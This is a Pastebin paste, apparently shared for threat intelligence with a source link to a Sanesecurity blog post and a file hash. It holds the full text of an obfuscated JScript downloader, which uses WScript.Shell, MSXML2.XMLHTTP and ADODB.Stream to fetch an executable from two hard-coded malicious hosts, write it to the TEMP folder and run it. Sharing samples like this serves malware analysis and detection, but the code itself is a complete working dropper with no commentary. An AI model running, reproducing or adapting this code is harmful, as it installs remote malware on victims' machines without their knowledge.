Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- source: http://sanesecurity.blogspot.co.il/2015/12/required-your-attention-javascript.html
- hash: 026727700e7004fd9e73f2873d561a98220a91059be608db908e0afe85b4e834
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- var j = "whatdidyaysay.com/80.exe? iamthewinnerhere.com/80.exe? ? ?".split(" ");
- var BCE = ((1 /*PwuM121746596n53780uM354193eOiZ*/ ) ? "WScri" : "") + "pt.Shell";
- var XQ = WScript.CreateObject(BCE);
- var jO = "%TEMP%\\";
- var MFd = XQ.ExpandEnvironmentStrings(jO);
- var hsI = "2.XMLH";
- var vjg = hsI + "TTP";
- var VM = true,
- iEIv = "ADOD";
- var TZ = WScript.CreateObject("MS" + "XML" + (193985, vjg));
- var ElO = WScript.CreateObject(iEIv + "B.St" + (463805, "ream"));
- var flO = 0;
- var A = 1;
- var lIWLNnM = 894743;
- for (var m = flO; m < j.length; m++) {
- var Iz = 0;
- try {
- poi = "GET";
- TZ.open(poi, "http://" + j[m] + A, false);
- TZ.send();
- if (TZ.status == 464 - 264) {
- ElO.open();
- ElO.type = 1;
- ElO.write(TZ.responseBody);
- if (ElO.size > 153843 - 687) {
- Iz = 1;
- ElO.position = 0;
- ElO.saveToFile /*60Qz32jeIP*/
- (MFd /*iiCL37HE2T*/ + lIWLNnM + ".exe", 4 - 2);
- try {
- if (((new Date()) > 0, 7994387888)) {
- XQ. /*d960569TOuz*/
- Run(MFd + lIWLNnM + /*kAOJ423kFX*/ ".exe", /*PTse83f5dR*/ 3 - 2, 0);
- break;
- }
- } catch (pf) {};
- };
- ElO.close();
- };
- if (Iz == 1) {
- flO = m;
- break;
- };
- } catch (pf) {};
- };
Add Comment
Please, Sign In to add comment